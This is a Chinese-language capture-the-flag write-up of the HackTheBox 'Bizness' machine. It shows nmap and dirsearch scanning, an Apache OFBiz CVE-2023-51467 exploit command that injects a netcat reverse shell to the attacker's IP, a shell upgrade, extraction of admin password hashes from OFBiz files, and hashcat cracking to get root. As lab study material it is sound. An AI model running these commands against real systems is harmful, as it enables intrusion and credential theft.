HackTheBox Bizness

HackTheBox Bizness

加更一个 

HTB-Bizness

老规矩 介绍环境

攻击:10.10.14.5

靶机:10.10.11.252

还是nmap 扫一下基本的漏扫 现在喜欢直接-A 然后让他去扫 

nmap -A 10.10.11.252

讲真的 这题我是没啥头绪的 看到个 80 端口 先去访问看看 

访问的时候 会跳转域名

https://bizness.htb/

然后就发现访问不到  要做两步骤

1.导入burp证书--这一步就不截图了一搜就能搜到 太繁琐了 不占篇幅

2.hosts文件写入内容

10.10.11.252    https://bizness.htb/

就是把ip和域名对应上也没啥难得

然后正常访问页面  页面上没有啥能交互的地方

扫目录

dirsearch -u https://bizness.htb/ -e*

吐槽一下   kali 里面的浏览器真的太不好用了

看起来这个admin 真心动 但其实没啥用 -_-

然后看看登录页面

反正弱口令 SQL注入 都试了试 没用

忘记密码这里也试了 没有啥逻辑漏洞可以获取管理员权限的

到这里 我就已经懵逼了 完全没思路 

然后看着包发呆 注意到他的Cookie有点特别

还行还没见过   .jvm1 这种Cookie 我又想是不是问题出在这里 搜了一下  没关系

然后拿剩下的Cookie搜 

反正就是让我看到好像有希望  找到一个相关的洞

研究了 Apache OFBiz 漏洞，发现 CVE-2023–51467 允许绕过身份验证

关于这个洞的解析

然后觉得肯定就是这个了 再不行我就不干了

有现成的EXP : jakabakos/Apache-OFBiz-Authentication-Bypass: This repo is a PoC with to exploit CVE-2023-51467 and CVE-2023-49070 preauth RCE vulnerabilities found in Apache OFBiz. (github.com)

于是

nc -lnvp 1377 
python3 exploit.py --url https://bizness.htb/ --cmd 'nc -e /bin/bash 10.10.14.5 1337'

反弹shell 试试看

 

终于get 到user flag了 

但是难题接踵而至  sudo -l 没反应 应该是需要交互shell 说明sudo 需要输入密码   提权难到我了

最后就是问人 找答案  以下方式 都不是我自己做的了 

交互式shell:

script /dev/null -qc /bin/bash

然后就一个一个看文件  最终在/opt/ofbiz/framework/resources/templates/ 中发现了一个有趣的文件AdminUserLoginData.xml

这个文件里有个 hash 值  : 47ca69ebb4bdc9ae0adec130880165d2cc05db1a

是密码 但问题是 你解不开 然后又找到一个文件/opt/ofbiz/runtime/data/derby/ofbiz/seg0/c54d0.dat

这个文件里面有个 hash 值 :  $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I

这就看出来了 sha加密 但还是不懂要怎么用 

看到别的大佬 有这个工具可以用

IamLucif3r/Go-Hash-Matcher: A simple password cracker written in Go, designed to search for a specific hashed password in a wordlist. (github.com)

或者 

hashcat (kali 自带)

但是需要在这里转换下:

CyberChef

hashcat -m 120 -a 0 -d 1 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt

最后执行这个 这个  :d  是我看别人说这个是盐值?之类的东西 反正要加上

最终出来root密码

连接root  最后查看root  flag

OK 完成了  总体就是这样